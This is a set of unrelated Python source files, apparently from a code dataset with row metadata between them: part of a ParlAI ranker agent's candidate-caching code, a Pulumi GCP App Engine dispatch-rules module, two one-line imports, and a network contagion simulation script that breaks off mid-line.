"".format(len(self.vocab_candidates))
)
if self.use_cuda:
self.vocab_candidate_vecs = self.vocab_candidate_vecs.cuda()
if self.encode_candidate_vecs:
# encode vocab candidate vecs
self.vocab_candidate_encs = self._make_candidate_encs(
self.vocab_candidate_vecs
)
if self.use_cuda:
self.vocab_candidate_encs = self.vocab_candidate_encs.cuda()
if self.fp16:
self.vocab_candidate_encs = self.vocab_candidate_encs.half()
else:
self.vocab_candidate_encs = self.vocab_candidate_encs.float()
else:
self.vocab_candidate_encs = None
else:
self.vocab_candidates = None
self.vocab_candidate_vecs = None
self.vocab_candidate_encs = None
def set_fixed_candidates(self, shared):
"""
Load a set of fixed candidates and their vectors (or vectorize them here).
self.fixed_candidates will contain a [num_cands] list of strings
self.fixed_candidate_vecs will contain a [num_cands, seq_len] LongTensor
See the note on the --fixed-candidate-vecs flag for an explanation of the
'reuse', 'replace', or path options.
Note: TorchRankerAgent by default converts candidates to vectors by vectorizing
in the common sense (i.e., replacing each token with its index in the
dictionary). If a child model wants to additionally perform encoding, it can
override the vectorize_fixed_candidates() method to produce encoded vectors
instead of just vectorized ones.
"""
if shared:
self.fixed_candidates = shared['fixed_candidates']
self.fixed_candidate_vecs = shared['fixed_candidate_vecs']
self.fixed_candidate_encs = shared['fixed_candidate_encs']
self.num_fixed_candidates = shared['num_fixed_candidates']
else:
self.num_fixed_candidates = 0
opt = self.opt
cand_path = self.fixed_candidates_path
if 'fixed' in (self.candidates, self.eval_candidates):
if not cand_path:
# Attempt to get a standard candidate set for the given task
path = self.get_task_candidates_path()
if path:
print("[setting fixed_candidates path to: " + path + " ]")
self.fixed_candidates_path = path
cand_path = self.fixed_candidates_path
# Load candidates
print("[ Loading fixed candidate set from {} ]".format(cand_path))
with open(cand_path, 'r', encoding='utf-8') as f:
cands = [line.strip() for line in f.readlines()]
# Load or create candidate vectors. The cache path names are computed up
# front because the encoding cache below needs them in every branch.
setting = self.opt['fixed_candidate_vecs']
model_dir, model_file = os.path.split(self.opt['model_file'])
model_name = os.path.splitext(model_file)[0]
cands_name = os.path.splitext(os.path.basename(cand_path))[0]
vecs_path = os.path.join(
model_dir, '.'.join([model_name, cands_name, 'vecs'])
)
if os.path.isfile(setting):
# --fixed-candidate-vecs points directly at a saved vectors file
vecs = self.load_candidates(setting)
elif setting == 'reuse' and os.path.isfile(vecs_path):
vecs = self.load_candidates(vecs_path)
else: # setting == 'replace' OR generating for the first time
vecs = self._make_candidate_vecs(cands)
self._save_candidates(vecs, vecs_path)
self.fixed_candidates = cands
self.num_fixed_candidates = len(self.fixed_candidates)
self.fixed_candidate_vecs = vecs
if self.use_cuda:
self.fixed_candidate_vecs = self.fixed_candidate_vecs.cuda()
if self.encode_candidate_vecs:
# candidate encodings are fixed so set them up now
enc_path = os.path.join(
model_dir, '.'.join([model_name, cands_name, 'encs'])
)
if setting == 'reuse' and os.path.isfile(enc_path):
encs = self.load_candidates(enc_path, cand_type='encodings')
else:
encs = self._make_candidate_encs(self.fixed_candidate_vecs)
self._save_candidates(
encs, path=enc_path, cand_type='encodings'
)
self.fixed_candidate_encs = encs
if self.use_cuda:
self.fixed_candidate_encs = self.fixed_candidate_encs.cuda()
if self.fp16:
self.fixed_candidate_encs = self.fixed_candidate_encs.half()
else:
self.fixed_candidate_encs = self.fixed_candidate_encs.float()
else:
self.fixed_candidate_encs = None
else:
self.fixed_candidates = None
self.fixed_candidate_vecs = None
self.fixed_candidate_encs = None
def load_candidates(self, path, cand_type='vectors'):
"""
Load fixed candidates from a path.
"""
print("[ Loading fixed candidate set {} from {} ]".format(cand_type, path))
return torch.load(path, map_location=lambda cpu, _: cpu)
def _make_candidate_vecs(self, cands):
"""
Prebuild cached vectors for fixed candidates.
"""
cand_batches = [cands[i : i + 512] for i in range(0, len(cands), 512)]
print(
"[ Vectorizing fixed candidate set ({} batch(es) of up to 512) ]"
"".format(len(cand_batches))
)
cand_vecs = []
for batch in tqdm(cand_batches):
cand_vecs.extend(self.vectorize_fixed_candidates(batch))
return padded_3d(
[cand_vecs], pad_idx=self.NULL_IDX, dtype=cand_vecs[0].dtype
).squeeze(0)
def _save_candidates(self, vecs, path, cand_type='vectors'):
"""
Save cached vectors.
"""
print("[ Saving fixed candidate set {} to {} ]".format(cand_type, path))
with open(path, 'wb') as f:
torch.save(vecs, f)
def encode_candidates(self, padded_cands):
"""
Encode the given padded candidate vectors into fixed-size representations.
This is an abstract method that must be implemented by the user.
:param padded_cands:
The padded candidates.
"""
raise NotImplementedError(
'Abstract method: user must implement encode_candidates(). '
'If your agent encodes candidates independently '
'of context, you can get performance gains with fixed cands by '
'implementing this function and running with the flag '
'--encode-candidate-vecs True.'
)
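# A minimal sketch of a child-class override (hypothetical: it assumes the
# model exposes an encode_cands() helper, which this base class does not
# define):
#
#   def encode_candidates(self, padded_cands):
#       # one fixed-size representation per padded candidate vector
#       return self.model.encode_cands(padded_cands)  # [num_cands, dim]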
def _make_candidate_encs(self, vecs):
"""
Encode candidates from candidate vectors.
Requires encode_candidates() to be implemented.
"""
cand_encs = []
bsz = self.opt.get('encode_candidate_vecs_batchsize', 256)
vec_batches = [vecs[i : i + bsz] for i in range(0, len(vecs), bsz)]
print(
"[ Encoding fixed candidates set from ({} batch(es) of up to {}) ]"
"".format(len(vec_batches), bsz)
)
# Put model into eval mode when encoding candidates
self.model.eval()
with torch.no_grad():
for vec_batch in tqdm(vec_batches):
cand_encs.append(self.encode_candidates(vec_batch).cpu())
return torch.cat(cand_encs, 0).to(vec_batch.device)
def vectorize_fixed_candidates(self, cands_batch, add_start=False, add_end=False):
"""
Convert a batch of candidates from text to vectors.
:param cands_batch:
a [batchsize] list of candidates (strings)
:returns:
a [num_cands] list of candidate vectors
By default, candidates are simply vectorized (tokens replaced by token ids).
A child class may choose to override this method to perform vectorization as
well as encoding if so desired.
"""
return [
self._vectorize_text(
cand,
truncate=self.label_truncate,
truncate_left=False,
add_start=add_start,
add_end=add_end,
)
for cand in cands_batch
]
| 42.185204 | 97 | 0.550011 | 9,428 | 83,822 | 4.723059 | 0.066928 | 0.028027 | 0.019403 | 0.014822 | 0.979339 | 0.978419 | 0.977745 | 0.977745 | 0.977745 | 0.977745 | 0 | 0.004779 | 0.355921 | 83,822 | 1,986 | 98 | 42.206445 | 0.820016 | 0.567727 | 0 | 0.294606 | 0 | 0 | 0.169112 | 0.019925 | 0 | 0 | 0 | 0.001007 | 0.001383 | 1 | 0.034578 | false | 0.002766 | 0.02213 | 0 | 0.095436 | 0.016598 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bcc3ce209d16a1f1a0aa9ad76c7aec97988e31bd | 14,152 | py | Python | sdk/python/pulumi_gcp/appengine/application_url_dispatch_rules.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_gcp/appengine/application_url_dispatch_rules.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_gcp/appengine/application_url_dispatch_rules.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApplicationUrlDispatchRulesArgs', 'ApplicationUrlDispatchRules']
@pulumi.input_type
class ApplicationUrlDispatchRulesArgs:
def __init__(__self__, *,
dispatch_rules: pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]],
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ApplicationUrlDispatchRules resource.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "dispatch_rules", dispatch_rules)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="dispatchRules")
def dispatch_rules(self) -> pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]:
"""
Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
"""
return pulumi.get(self, "dispatch_rules")
@dispatch_rules.setter
def dispatch_rules(self, value: pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]):
pulumi.set(self, "dispatch_rules", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _ApplicationUrlDispatchRulesState:
def __init__(__self__, *,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApplicationUrlDispatchRules resources.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if dispatch_rules is not None:
pulumi.set(__self__, "dispatch_rules", dispatch_rules)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="dispatchRules")
def dispatch_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]:
"""
Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
"""
return pulumi.get(self, "dispatch_rules")
@dispatch_rules.setter
def dispatch_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]):
pulumi.set(self, "dispatch_rules", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class ApplicationUrlDispatchRules(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Rules to match an HTTP request and dispatch that request to a service.
To get more information about ApplicationUrlDispatchRules, see:
* [API documentation](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps#UrlDispatchRule)
## Example Usage
### App Engine Application Url Dispatch Rules Basic
```python
import pulumi
import pulumi_gcp as gcp
bucket = gcp.storage.Bucket("bucket")
object = gcp.storage.BucketObject("object",
bucket=bucket.name,
source=pulumi.FileAsset("./test-fixtures/appengine/hello-world.zip"))
admin_v3 = gcp.appengine.StandardAppVersion("adminV3",
version_id="v3",
service="admin",
runtime="nodejs10",
entrypoint=gcp.appengine.StandardAppVersionEntrypointArgs(
shell="node ./app.js",
),
deployment=gcp.appengine.StandardAppVersionDeploymentArgs(
zip=gcp.appengine.StandardAppVersionDeploymentZipArgs(
source_url=pulumi.Output.all(bucket.name, object.name).apply(lambda bucket_name, object_name: f"https://storage.googleapis.com/{bucket_name}/{object_name}"),
),
),
env_variables={
"port": "8080",
},
noop_on_destroy=True)
web_service = gcp.appengine.ApplicationUrlDispatchRules("webService", dispatch_rules=[
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/*",
service="default",
),
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/admin/*",
service=admin_v3.service,
),
])
```
## Import
ApplicationUrlDispatchRules can be imported using any of these accepted formats
```sh
$ pulumi import gcp:appengine/applicationUrlDispatchRules:ApplicationUrlDispatchRules default {{project}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationUrlDispatchRulesArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Rules to match an HTTP request and dispatch that request to a service.
To get more information about ApplicationUrlDispatchRules, see:
* [API documentation](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps#UrlDispatchRule)
## Example Usage
### App Engine Application Url Dispatch Rules Basic
```python
import pulumi
import pulumi_gcp as gcp
bucket = gcp.storage.Bucket("bucket")
object = gcp.storage.BucketObject("object",
bucket=bucket.name,
source=pulumi.FileAsset("./test-fixtures/appengine/hello-world.zip"))
admin_v3 = gcp.appengine.StandardAppVersion("adminV3",
version_id="v3",
service="admin",
runtime="nodejs10",
entrypoint=gcp.appengine.StandardAppVersionEntrypointArgs(
shell="node ./app.js",
),
deployment=gcp.appengine.StandardAppVersionDeploymentArgs(
zip=gcp.appengine.StandardAppVersionDeploymentZipArgs(
source_url=pulumi.Output.all(bucket.name, object.name).apply(lambda bucket_name, object_name: f"https://storage.googleapis.com/{bucket_name}/{object_name}"),
),
),
env_variables={
"port": "8080",
},
noop_on_destroy=True)
web_service = gcp.appengine.ApplicationUrlDispatchRules("webService", dispatch_rules=[
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/*",
service="default",
),
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/admin/*",
service=admin_v3.service,
),
])
```
## Import
ApplicationUrlDispatchRules can be imported using any of these accepted formats
```sh
$ pulumi import gcp:appengine/applicationUrlDispatchRules:ApplicationUrlDispatchRules default {{project}}
```
:param str resource_name: The name of the resource.
:param ApplicationUrlDispatchRulesArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationUrlDispatchRulesArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationUrlDispatchRulesArgs.__new__(ApplicationUrlDispatchRulesArgs)
if dispatch_rules is None and not opts.urn:
raise TypeError("Missing required property 'dispatch_rules'")
__props__.__dict__["dispatch_rules"] = dispatch_rules
__props__.__dict__["project"] = project
super(ApplicationUrlDispatchRules, __self__).__init__(
'gcp:appengine/applicationUrlDispatchRules:ApplicationUrlDispatchRules',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'ApplicationUrlDispatchRules':
"""
Get an existing ApplicationUrlDispatchRules resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationUrlDispatchRulesState.__new__(_ApplicationUrlDispatchRulesState)
__props__.__dict__["dispatch_rules"] = dispatch_rules
__props__.__dict__["project"] = project
return ApplicationUrlDispatchRules(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dispatchRules")
def dispatch_rules(self) -> pulumi.Output[Sequence['outputs.ApplicationUrlDispatchRulesDispatchRule']]:
"""
Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
"""
return pulumi.get(self, "dispatch_rules")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
| 44.503145 | 203 | 0.652841 | 1,413 | 14,152 | 6.361642 | 0.155697 | 0.05262 | 0.031705 | 0.036155 | 0.767382 | 0.751029 | 0.734453 | 0.722995 | 0.702748 | 0.702748 | 0 | 0.002184 | 0.256006 | 14,152 | 317 | 204 | 44.643533 | 0.851553 | 0.469828 | 0 | 0.550847 | 1 | 0 | 0.161676 | 0.09366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144068 | false | 0.008475 | 0.059322 | 0 | 0.288136 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bcd2e0d8ff9e17bfff42d10d00839a8c6eba93bf | 44 | py | Python | cygraphblas/lib/descriptor/ss.py | eriknw/cygraphblas | 81ae37591ec38aa698d5f37716464a6c366076f9 | [
"Apache-2.0"
] | 3 | 2020-09-03T21:47:25.000Z | 2021-08-06T20:24:19.000Z | cygraphblas/lib/descriptor/ss.py | eriknw/cygraphblas | 81ae37591ec38aa698d5f37716464a6c366076f9 | [
"Apache-2.0"
] | null | null | null | cygraphblas/lib/descriptor/ss.py | eriknw/cygraphblas | 81ae37591ec38aa698d5f37716464a6c366076f9 | [
"Apache-2.0"
] | 2 | 2020-09-03T21:47:52.000Z | 2021-08-06T20:24:20.000Z | from cygraphblas_ss.lib.descriptor import *
| 22 | 43 | 0.840909 | 6 | 44 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bcec87ae36d9ffee5a73337cdd50ec825c8b6eed | 27 | py | Python | handlers/admin/__init__.py | vR4eslav/DatingBot | 62f9ccbe1a3d0c65dd8d650400a1b5595be893b5 | [
"Apache-2.0"
] | null | null | null | handlers/admin/__init__.py | vR4eslav/DatingBot | 62f9ccbe1a3d0c65dd8d650400a1b5595be893b5 | [
"Apache-2.0"
] | null | null | null | handlers/admin/__init__.py | vR4eslav/DatingBot | 62f9ccbe1a3d0c65dd8d650400a1b5595be893b5 | [
"Apache-2.0"
] | null | null | null | from . import admin_handler | 27 | 27 | 0.851852 | 4 | 27 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4c18903a2bfdee92d45c203367ca98e0f9c65dfe | 11,347 | py | Python | plot_barabasi2.py | koshini/polya-social-contagion | ad3915a59611589160e5c7f5e6a1d82489e6e1b2 | [
"MIT"
] | null | null | null | plot_barabasi2.py | koshini/polya-social-contagion | ad3915a59611589160e5c7f5e6a1d82489e6e1b2 | [
"MIT"
] | 1 | 2019-04-03T20:45:05.000Z | 2019-04-07T18:06:13.000Z | plot_barabasi2.py | koshini/polya-social-contagion | ad3915a59611589160e5c7f5e6a1d82489e6e1b2 | [
"MIT"
] | null | null | null | import networkx as nx
from graph_generator import generate_graph
from simulation import simulate
import time
import matplotlib.pyplot as plt
import numpy as np
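# Experiment driver: repeatedly simulates competing red (infection) and black
# (curing) budget-allocation strategies on a Barabasi-Albert ('barabasi')
# network, then plots the average infection rate over time for each scenario.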
runs = 200
node_count = 25
iterations = 300
initial_balls = node_count * 100
topology = 'barabasi'
def main():
folder = 'neutral-equal-25/'
red_mult = 1
black_mult = 1
red_budget = node_count * 10
black_budget = node_count * 10
run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'neutral-more-red/'
red_mult = 1
black_mult = 1
red_budget = node_count * 10
black_budget = node_count * 7
# run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'pre-infected-equal-25/'
red_mult = 2
black_mult = 1
red_budget = node_count * 10
black_budget = node_count * 10
run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'pre-cured-equal-25/'
red_mult = 1
black_mult = 2
red_budget = node_count * 10
black_budget = node_count * 10
run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'pre-cured-more-red/'
red_mult = 1
black_mult = 2
red_budget = node_count * 10
black_budget = node_count * 7
# run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
def run_scenario(folder, red_mult, black_mult, red_budget, black_budget):
initial_condition = {
'node_count': node_count,
'parameter': 2,
'red': initial_balls * red_mult,
'black': initial_balls * black_mult,
'dist': 'random'
}
print('-------------' + folder)
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'gradient',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality_threshold',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'follow_bot',
})
run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
make_plots(folder, topology, strat_dict_list, 'all-strats')
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.2,
'portion': 0.01
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.2,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.2,
'portion': 0.1
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, '0.2vary-portion')
###############################
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.01
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.1
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, '0.4vary-portion')
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.6,
'portion': 0.01
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.6,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.6,
'portion': 0.1
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, '0.6vary-portion')
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_degree',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_closeness',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_exposure',
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
#### Plot exposure-degree-closeness
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_exposure',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_degree',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_closeness',
})
# make_plots(folder, topology, strat_dict_list, 'exposure-degree-closeness')
#### Plot centrality-degree-closeness
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_degree',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_closeness',
})
# make_plots(folder, topology, strat_dict_list, 'centrality-degree-closeness')
############################### gradient nash equilibrium
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'uniform',
'black_strat': 'gradient',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'gradient',
'black_strat': 'gradient',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'gradient',
'black_strat': 'uniform',
})
#
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, 'gradient-nash-equil')
def run_strats(folder, topology, red_mult, black_mult, strat_list, iterations, runs, initial_condition):
for strat in strat_list:
print(str(strat))
start = time.time()
prefix = ''
if strat.get('threshold') is not None:
prefix = str(strat['threshold']) + '_' + str(strat['portion'])
simulate(folder, topology, red_mult, black_mult, strat, iterations, runs, prefix=prefix, initial_condition=initial_condition)
elapsed_time = time.time() - start
print(elapsed_time)
print()
log_file = folder + 'log.txt'
with open(log_file, 'a') as f:
f.write(str(strat) + '\n')
f.write(str(elapsed_time) + '\n')
f.write('\n')
def make_plots(folder, topology, strat_dict_list, plot_name):
plt.figure()
for strat_dict in strat_dict_list:
if topology == 'twitter':
iterations = 60
else:
iterations = 300
prefix = ''
red_strat = strat_dict['red_strat'].replace('_', ' ')
black_strat = strat_dict['black_strat'].replace('_', ' ')
if black_strat == 'centrality threshold':
black_strat = 'adjusted centrality exposure threshold'
if black_strat == 'pure centrality threshold':
black_strat = 'centrality exposure threshold'
infection_csv = folder + '/empirical-infection' + topology + strat_dict['red_strat'] + strat_dict[
'black_strat'] + 'infection.csv'
if strat_dict.get('threshold') is not None:
prefix = str(strat_dict['threshold']) + '_' + str(strat_dict['portion'])
if prefix:
infection_csv = folder + topology + prefix + strat_dict['red_strat'] + strat_dict[
